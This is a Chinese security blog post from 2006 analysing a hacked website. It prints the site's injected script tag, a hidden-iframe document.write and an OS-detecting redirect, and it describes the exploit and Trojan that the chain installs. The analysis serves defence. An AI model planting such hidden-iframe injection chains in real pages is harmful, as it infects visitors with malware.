endurer 原创

2006-04-24 第1

在hxxp://www.hj234.com的主页有代码:

<script language=JavaScript src="hxxp://www.***hj234.com/abc/abc.js"></script>

hxxp://www.***hj234.com/abc/abc.js的内容为:


document.write("<iframe height=0 width=0 frameborder=0 src='hxxp://www.***hj234.com/abc/joke.htm'></iframe>")

hxxp://www.***hj234.com/abc/joke.htm的内容为:


 <center><font color=red>对不起,您访问的页面不存在!</font><center>                             <script language=javascript>ie='windows';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';</script>

会根据浏览者所用Windows版本,打开windows.htm,winnt.htm或w98.htm

从这个网页开始,所用的技术与发现一个使用技术升级、下载灰鸽子的网站相同。

这3个网页会下载/运行文件young.gifyoung.css

young.gif 是个利用系统漏洞的网页文件,访问注册表获取IE临时文件夹路径,并利用WScript.Shell复制文件young.css,创建文件c:/wins.bat,c:/boot.hta,C:/wins.exe。
江民KV2006报为Exploit.VBS.Phel.ba

young.css 用VB6编写,修改IE启动页,创建名为services.exe的文件,并在注册表的run键加入开机启动项,江民KV2006报为TrojanDropper.Delf.d

再分享一下我老师大神的人工智能教程吧。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到我们人工智能的队伍中来!https://blog.csdn.net/jiangjunshow

关于hxxp //www hj234 com的问题相关推荐

  1. hxxp://www.hao923.com.cn/劫持浏览器

    一位网友在国庆那天,为了在网上看阅兵式,从网上下载安装了一个软件,不料IE主页被劫持为hxxp://www.hao923.com.cn/,用超级巡警无法修复,请偶帮忙检修. 右击网友电脑桌面上的IE图 ...

  2. IE被hxxp://www.pp8000.cn劫持,卡卡报IE为可疑后门程序

    IE被hxxp://www.pp8000.cn劫持,卡卡报IE为可疑后门程序 endurer 原创 2009-02-15 第1版 一位网友的电脑最近打开IE总是显示hxxp://www.pp8000. ...

  3. 抽象工厂模式AbstractFactory

    简介 抽象工厂模式(Abstract Factory Pattern):提供一个创建一系列相关或相互依赖对象的接口,而无须指定它们具体的类.抽象工厂模式又称为Kit模式,属于对象创建型模式. 不同点 ...

  4. 一种新的攻击方式:使用Outlook 表单进行横向渗透和常驻

    本文讲的是一种新的攻击方式:使用Outlook 表单进行横向渗透和常驻, 背景 最近我们针对CrowdStrike服务进行例行调查,发现了一种攻击方法,其主要用于横向渗透和系统常驻,而且是以前我们没有 ...

  5. 房子成焦点,被挂马的房产网站仍在增加中

    统计发现,近期大部分使用极光漏洞挂马,这个漏洞实在是太好用了.没打补丁,没装网盾,按网马广告上说的,有不弹.不卡.不闪三大"优点",点击挂马网页会中招. 今天新增被挂马的知名房产网 ...

  6. 使用 Firefox攻击Web2.0应用(二)

    三.Web2.0安全评估面临的挑战 在Web2.0这个异步的框架中,Web应用不再需要以前那么频繁的页面刷新和重定向,这样,一些原本能够被利用的服务器资源被隐藏了起来.以下是安全研究人员在理解Web2 ...

  7. 威胁预警|多个挖矿僵尸网络开始使用ThinkPHP v5漏洞 威胁升级

    前言 12月10日ThinkPHP团队发布了版本更新,修复了一处远程命令执行漏洞,该漏洞是由于ThinkPHP框架对控制器没有进行严格的安全过滤,致使攻击者可以伪造恶意参数进行代码执行.12月11日阿 ...

  8. 69.2. wget - retrieves files from the web

    setlocal ENABLEDELAYEDEXPANSION for /l %%i in (1001,1,1162) do for /l %%j in (101,1,112) do @(set s= ...

  9. 断网与黑客无关 我来抖一抖暴风那点见不得人的猫腻

    这几天看新闻,发现暴风七搞八搞,居然包装成了5.19断网的受害者,听说实际上是暴风被ZF封杀,在新版本发布前,不准提供旧版本的下载,结果搞成了什么"召回".然后就是一帮弱智媒体跟着 ...

最新文章

  1. The ultimate end-to-end tutorial to create and deploy a fully decentralized Dapp in ethereum
  2. 鸿蒙关键技术研究,鸿蒙内核源码分析(静态链接篇) | 完整小项目看透静态链接过程 | 百篇博客分析HarmonyOS源码 | v54.02...
  3. 编译原理——实验叁预习报告——基于YACC的TINY语法分析器的构建
  4. C#操作 excel表格
  5. 京东一面:说出ThreadLocal的使用场景及使用方式
  6. 生成ltx文件命令_利用二次开发工具批量生成PCDMIS程序
  7. 为什么C# md5 32位加密算法,密码明文会出现31位
  8. 判断浏览器是IE的几种方式
  9. 腾讯云分布式高可靠消息队列CMQ架构最佳实践
  10. 2018-2019-1 20165214 《信息安全系统设计基础》第九周学习总结
  11. android-handler、looper、messageQueue、message
  12. 【并行计算-CUDA开发】CUDA shared memory bank 冲突
  13. linux 火狐打不开网页视频,Ubuntu下Firefox不能播放html视频的问题
  14. ceph 代码分析 读_Ceph代码分析
  15. 基于HTML5 Canvas实现炫酷钟表效果
  16. 固定光束扫描器行业研究及十四五规划分析报告
  17. mac每次执行mvn -v命令要先执行source ~/.bash_profile才生效
  18. CycleGAN中欺骗相反域的鉴别器是什么意思
  19. ios开发中常用的一些软件
  20. Three.js实现剖切

热门文章

  1. StringUtil 简单用法
  2. association的使用
  3. pycuda的安装,wheel报错
  4. csharp c++
  5. python输出中文加数字_Python实现阿拉伯数字加上中文数字
  6. hadoop之slaves文件详细分析
  7. python 爬虫程序详解
  8. 单片机_MFRC522射频模块使用方法(含代码)
  9. jQuery源码解析(架构与依赖模块)
  10. 什么是Java SE、Java EE、Java ME?